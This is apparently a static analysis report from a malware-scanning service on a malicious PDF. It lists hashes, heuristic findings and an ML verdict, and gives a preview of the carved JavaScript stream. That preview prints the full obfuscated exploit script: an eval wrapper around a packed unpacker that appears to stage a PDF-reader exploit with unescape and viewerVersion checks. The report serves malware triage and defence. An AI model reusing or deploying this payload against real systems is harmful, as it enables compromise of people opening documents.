Malicious PDF — malware analysis report

Static analysis result for SHA-256 41938a0cee9db501…

MALICIOUS

PDF

9.1 KB · Created: 2009-07-22 13:59:09 · Authoring application: BEtKvRRguAcmcYk (via xDvtSSMFXKgkx) · First seen: 2013-05-16
MD5: e0697597a179dcbe4ae9482e1ee4ae8c SHA-1: 2caa8a2f08b43b913f0f35aab0567b1565d8c4dc SHA-256: 41938a0cee9db50187a85db9342000ada3e24f26ed63037076f8060da1cfd82b
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The extracted JavaScript file, 'javascript_obj0007_000.js', is obfuscated and likely responsible for downloading and executing a secondary payload, a common technique for initial access. The script preview below shows an eval() wrapper fed by a p,a,c,k,e,d-style string unpacker whose word list includes eval, unescape, fromCharCode, charCodeAt, app and viewerVersion — the kind of indicators the PDF_JS_EXPLOIT_CLUSTER heuristic describes. The document body text is largely unreadable, providing no further context.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    ,d
    \){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1H 2t\(1a\){X Z=0;X 16="";2u\(Z=0;Z<1a.2z;Z++\){16=16+2i.1R\(1a.1O\(Z\)^1\)}1E 16}1H 1I\(1F\){1E 1L\(1F\)}X 1d=1M.1P.1S\(\);1d=1d.1G\(/\\\\D/g,""\) …
    )
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x3AA | 7597 bytes
SHA-256: be921cb5a430eff4ed94c524de40048440db17bdbeb38ae28353c6b32da3fb06
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Thin wrapper around eval(): executes whatever string it is handed as code.
// Both the function name and the parameter name look randomly generated, which
// is consistent with the obfuscation noted elsewhere in this report.
// In the preview below it is invoked with the return value of a
// p,a,c,k,e,d-style string unpacker, so the code that actually runs is not
// readable from this listing alone.
function Ipv251m(Srw8yo4znn){

 eval (
 Srw8yo4znn
 );
}

Ipv251m(
function(
p
,a
,c
,k
,e
,d
){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1H 2t(1a){X Z=0;X 16="";2u(Z=0;Z<1a.2z;Z++){16=16+2i.1R(1a.1O(Z)^1)}1E 16}1H 1I(1F){1E 1L(1F)}X 1d=1M.1P.1S();1d=1d.1G(/\\D/g,"");X 21="$1X$2I$N"+"3y$3z$3A"+"$r$3u$J"+"3q$3p$3r"+"$3s$3t$Q"+"3C$3K$3M"+"$t`3N$3J$J"+"3I$3D$3H"+"$3o$2Q$S"+"2S$2T$2U"+"$Y$2O$1c"+"2K$2J$r"+"$2L$2N$v"+"T$2V$2W"+"$K`$11$v"+"T$14$1D"+"$r$1m$V"+"3i$Y$P"+"$K`$11$v"+"T$1j$1h"+"$Q`1f$1g$v"+"3l$r$1l"+"$1C$1w$S"+"3m$2Z$1y"+"$1z$P$Q"+"3e`$3f$L"+"$14$12$v"+"3O$r$J`O"+"$U$1n$v"+"F$2X$12"+"$1A$r$v"+"17`$18`$J`O"+"$U$1b$v"+"F$2Y$K`"+"$3g$L$N"+"1k$18`$1q"+"$1r`$J`O$1o"+"3h$1b$r"+"$1s$N`1B$v"+"T$P$K`"+"$11$Y$N"+"1k$1D$r"+"$1m$3j$v"+"T$P$K`"+"$11$Y$S"+"2M$1h$Q`1f"+"$1g$2P$v"+"F$1l$1C"+"$1w$2R$J"+"3n$1y$1z"+"$P$K`$V"+"3G$L$14"+"$12$3F$v"+"F$J`O$U"+"$1n$r$N"+"3E$12$1A"+"$r$18`$v"+"17`$J`O$U"+"$1b$r$Q"+"3L$K`$t`3B"+"$L$14$v"+"17`$1q$1r`"+"$J`O$U$v"+"3v$r$1s"+"$N`1B$Y$19"+"3w$3x$N`4d"+"$2A$1W$v"+"F$r$r"+"$r$r$v"+"F$r$r"+"$1i$1V$13"+"1T$1U$1Y"+"$1Z$2g$13"+"27$24$2h"+"$1K$1J$v"+"1Q$1i$1N"+"$23$2H$13"+"2y$2w$2x"+"$2B$2C$R"+"2G$2F$2E"+"$2D$2v$1o"+"2n$2m`d$2l"+"$2j$2k$1c"+"2o$2p$r"+"$1p$W$v"+"F$t`1x$10"+"$W$r$R"+"2s$2r$2q"+"$1p$W$v"+"F$3k$4C"+"$r$1t`e$5m"+"5f$L$t`4Y"+"$1t`e$1u$v"+"1v$4X$t`e`c"+"$10$W$v"+"F$52`c$54"+"$5a`e$10$v"+"57$r$55"+"$5e$4W$t`"+"4V$4P$4O"+"$4N$4M$4Q"+"4R$4U$4T"+"$L$1j$19"+"3P$t`1x$4S"+"$5c$5k$v"+"1v$P$t`5w"+"$10$W$v"+"F$5v$5s"+"$r$r$v"+"F$r$r"+"$r$r$Q"+"5r$1u$L"+"$5q$5t$5u"+"5p$5n$5o"+"$5h`c$5i$1c"+"5j$5l$5g"+"$4Z$4K$V"+"4h$4g$4c"+"$47$4i$V"+"4j$4m$4l"+"$4k$44$V"+"40$3T$3S"+"$3R$3Q$R"+"3U$3V$3Z"+"$3Y$3X$R"+"3W$4n$4o"+"$4E$4D$R"+"4L$4B`$4F"+"$4G$4J$S"+"`u$1e$1e"+"$4I$4H$13"+"4A$4z$4s"+"$4r$4q$S"+"4p$4t$4u"+"$4y$4x$19"+"F"+"";X 
15="@4@f@28@45@8@x@M@37@n@2e@l@8@i@9@41@s@28@30@29@20@3d@3d@20@22@38@22@20@26@26@20@45@8@x@M@37@n@2e@l@8@i@9@41@s@28@31@29@20@3c@3d@20@22@31@22@20@26@26@20@45@8@x@M@37@"+"n@2e@l@8@i@9@41@s@28@32@29@20@3c@3d@20@22@32@22@29@H@j@m@49@w@k@f@k@w@20@3d@20@51@35@B@p@C@35@8@o@28@48@u@G@37@w@36@B@28@4b@8@9@u@a@M@29@29@3b@j@m@k@i@9@2"+"0@59@y@k@p@38@o@8@f@C@20@3d@20@51@35@B@p@C@35@8@o@28@22@25@q@30@i@30@i@22@20@2b@20@22@25@q@30@i@30@i@22@20@2b@20@22@22@29@3b@j@m@k@i@9@20@4b@4@G@4@h@p@w@20@3d"+"@20@32@30@20@2b@20@49@w@k@f@k@w@2e@a@u@h@A@s@8@3b@j@m@x@8@4@a@u@28@59@y@k@p@38@o@8@f@C@2e@a@u@h@A@s@8@20@3c@20@4b@4@G@4@h@p@w@29@20@59@y@k@p@38@o@"+"8@f@C@20@2b@3d@20@59@y@k@p@38@o@8@f@C@3b@j@m@k@i@9@20@58@h@y@30@G@h@38@31@20@3d@20@59@y@k@p@38@o@8@f@C@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@4b@4@G@4@h@7"+"1@w@29@3b@j@m@k@i@9@20@4e@33@36@36@4@l@q@20@3d@20@59@y@k@p@38@o@8@f@C@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@59@y@k@p@38@o@8@f@C@2e@a@u@h@A@s@8@20@2d@20@4b"+"@4@G@4@h@p@w@29@3b@j@m@x@8@4@a@u@28@4e@33@36@36@4@l@q@2e@a@u@h@A@s@8@20@2b@20@4b@4@G@4@h@p@w@20@3c@20@30@C@36@30@30@30@30@29@20@4e@33@36@36@4@l@q@20@3d@20@"+"4e@33@36@36@4@l@q@20@2b@20@4e@33@36@36@4@l@q@20@2b@20@58@h@y@30@G@h@38@31@3b@j@m@k@i@9@20@53@35@w@36@y@y@20@3d@20@h@u@x@20@41@9@9@i@M@28@29@3b@j@m@f@w@9@28@5"+"3@u@4@8@30@y@35@20@3d@20@30@3b@20@53@u@4@8@30@y@35@20@3c@20@31@32@30@30@3b@20@53@u@4@8@30@y@35@2b@2b@29@H@53@35@w@36@y@y@5b@53@u@4@8@30@y@35@5d@20@3d@20@4e@33@36@36@4"+"@l@q@20@2b@20@49@w@k@f@k@w@I@j@m@k@i@9@20@42@i@z@z@f@q@38@37@37@20@3d@20@22@31@32@22@3b@j@m@f@w@9@20@28@k@i@9@20@45@x@n@B@x@E@3d@30@3b@20@45@x@n@B@x@E@"+"3c@31@38@3b@20@45@x@n@B@x@E@2b@2b@29@H@20@42@i@z@z@f@q@38@37@37@20@3d@20@42@i@z@z@f@q@38@37@37@2b@22@39@22@3b@I@j@m@f@w@9@20@28@k@i@9@20@45@x@n@B@x@E@3d@30@3"+"b@20@45@x@n@B@x@E@3c@32@37@36@3b@20@45@x@n@B@x@E@2b@2b@29@H@20@42@i@z@z@f@q@38@37@37@20@3d@20@42@i@z@z@f@q@38@37@37@2b@22@38@22@3b@I@j@20@20@20@20@q@s@4@a@2e@B"+"@9@4@h@s@f@28@22@25@34@35@30@30@30@f@22@2c@20@42@i@z@z@f@q@38@37@37@29@3b@j@I@j@u@a@n@u@H@j@20@2
0@20@20@j@m@k@i@9@20@4b@p@30@o@y@h@20@3d@20@h@u@x@20@41@9@"+"9@i@M@28@29@3b@j@m@f@q@h@l@s@4@w@h@20@50@34@B@34@x@9@n@28@46@37@31@z@4@a@8@2c@20@45@4@A@34@33@A@p@l@30@29@H@j@m@x@8@4@a@u@28@46@37@31@z@4@a@8@2e@a@6"+"5@h@A@s@8@20@2a@20@32@20@3c@20@45@4@A@34@33@A@p@l@30@29@H@j@m@46@37@31@z@4@a@8@20@2b@3d@20@46@37@31@z@4@a@8@3b@I@j@m@46@37@31@z@4@a@8@20@3d@20@46@37@31@z@4@a"+"@8@2e@n@q@o@n@s@9@4@h@A@28@30@2c@20@45@4@A@34@33@A@p@l@30@20@2f@20@32@29@3b@j@m@9@u@s@q@9@h@20@46@37@31@z@4@a@8@3b@I@j@m@k@i@9@20@4e@4@f@36@38@37@20@3d@"+"20@30@C@30@l@30@l@30@l@30@l@3b@j@m@k@i@9@20@4b@E@q@4@a@y@9@20@3d@20@51@35@B@p@C@35@8@o@28@48@u@G@37@w@36@B@28@4b@8@9@u@a@M@29@29@3b@j@m@k@i@9@20@48@B@6"+"2@33@s@f@9@8@20@3d@20@30@C@34@30@30@30@30@30@3b@j@m@k@i@9@20@4f@o@x@f@a@s@37@n@20@3d@20@4b@E@q@4@a@y@9@2e@a@u@h@A@s@8@20@2a@20@32@3b@j@m@k@i@9@20@45@4@A"+"@34@33@A@p@l@30@20@3d@20@48@B@o@33@s@f@9@8@20@2d@20@28@4f@o@x@f@a@s@37@n@2b@30@C@33@38@29@3b@j@m@k@i@9@20@46@37@31@z@4@a@8@20@3d@20@51@35@B@p@C@35@8@o@28@22@"+"25@q@39@30@39@30@25@q@39@30@39@30@22@29@3b@j@m@46@37@31@z@4@a@8@20@3d@20@50@34@B@34@x@9@n@28@46@37@31@z@4@a@8@2c@20@45@4@A@34@33@A@p@l@30@29@3b@j@m@k@i@9@20@4a@7"+"1@37@E@a@n@A@s@32@20@3d@20@28@4e@4@f@36@38@37@20@2d@20@30@C@34@30@30@30@30@30@29@20@2f@20@48@B@o@33@s@f@9@8@3b@j@m@f@w@9@20@28@k@i@9@20@56@32@h@h@31@a@n@p@20@3d"+"@20@30@3b@20@56@32@h@h@31@a@n@p@20@3c@20@4a@p@37@E@a@n@A@s@32@3b@56@32@h@h@31@a@n@p@2b@2b@29@H@4b@p@30@o@y@h@5b@56@32@h@h@31@a@n@p@5d@20@3d@20@46@37@31@z@4@a@"+"8@20@2b@20@4b@E@q@4@a@y@9@3b@I@j@m@k@i@9@20@56@l@4@o@38@35@f@20@3d@20@51@35@B@p@C@35@8@o@28@22@25@q@30@l@30@22@20@2b@20@22@l@25@q@30@l@22@20@2b@20@22@30@l@22@2"+"0@2b@20@22@22@29@3b@j@m@x@8@4@a@u@28@56@l@4@o@38@35@f@2e@a@u@h@A@s@8@20@3c@20@34@34@39@35@32@29@20@56@l@4@o@38@35@f@20@2b@3d@20@56@l@4@o@38@35@f@3b@j@m@s@8@4"+"@n@2e@l@w@a@a@i@o@53@s@w@9@u@20@3d@20@43@w@a@a@i@o@2e@l@w@a@a@u@l@s@45@y@i@4@a@49@h@f@w@28@H@n@q@o@E@3a@20@22@22@2c@y@n@A@3a@20@56@l@4@o@38@35@f@"+"I@29@3b@j@I"+"";15=15.1G(/@/g,"%4w");4v(1I(15)
);',62,343,'||||69||||68|72|6c|||||66||6e|61|0a|76|63|09|73|62|71|75|t1111|74||65|t1|6f|77|6d|7a|67|70|78||6a|111|64|7b|7d|td|t90d|t1113|79|t4|98|t9811|t9|t6|t2|110|tb390|t5|t130c|var|t1110|Vanapptig|t9412|t4db3|t84gg|t7|t4311|Eazbd55c|Ugbs1u||t117|t8|Gsac691|t104d|tc|Ehwy7s|t2129|b3|t248b|t10g7|t7456|t2011|311|tgc91|tgg11|t1341|tb|tc412|te1gg|t147|tgg43|t12|t0c94|113|t9917|e77|tb7dd|t2315|t1047|84|t6511|t9179|return|B1rp445|replace|function|Q5pqx5hb|t6863|t7063|unescape|app|t4165|charCodeAt|viewerVersion|150|fromCharCode|toString|e74|t4161|t4565|tb249|t4241|t6570|t5079||Khrely||t7g63|t5b75|||07g|||||||||t5b11|t7378|String|t98g6|t20g8|t38ge|t64|121|db1|t112b|t0bb7|t9269|19c|Hed7o6p|for|tg698|t7463|t6262|575|length|t4c48|t4611|t7d78|tg398|tcc11|t7274|954|t5072|t4340|t105d|gdd|tdg10|011|te7d9|t1011|t137d|t9c6b|t230b|b51|t4647|t4dcd|t4g11|t984d|t4143|t9843|tdc57|||||||||||||||0d|t54b3|t69b3|390|d84|t5d84|tce9e|372|30b|c57|t519e|t201e|e92|t75b1|t5112|t6921|t4e11|04d|e11|t4g4e|647|t8b44|t11d9|7b3|c1b|t9c18|143|t1043|4b3|t2551|c19|t519c|t1b51|843|t619c|e0b|043|7g7|t7775|t6111|t5074|t7b78|164|t3d75|270|t6372|t1174|t6974|77g||||t4575|||t115b|||||t5b55||||t3d5d|g5e|t4344|55b|t707g|t7b7d|t667g|t3d79|t7961|e75|t782g|t6179|t613d|t3724|t7479|eval|u00|t267g|t7b7b|t747e|g72|t3g2|t130g|t6579|t1161|t703g|t7b24|t7b74|t663g|t703d|t5b43|165|t4dd8|tdc52|t4d15|t6548|te|082|td1b0|t3694|t12d1|7g2|tgb40|t4111|c11|t44b2|||t4d||tec20|tb798||30c|||t47||t1213||te698|c94|tdedc|t10|t91bd|c2d|t0g94|t1365|t0|tgggg|t4d4g|g49|t4711|811|t1101|td946|tg|tdcb2|eb7'.split('|'),0,{}))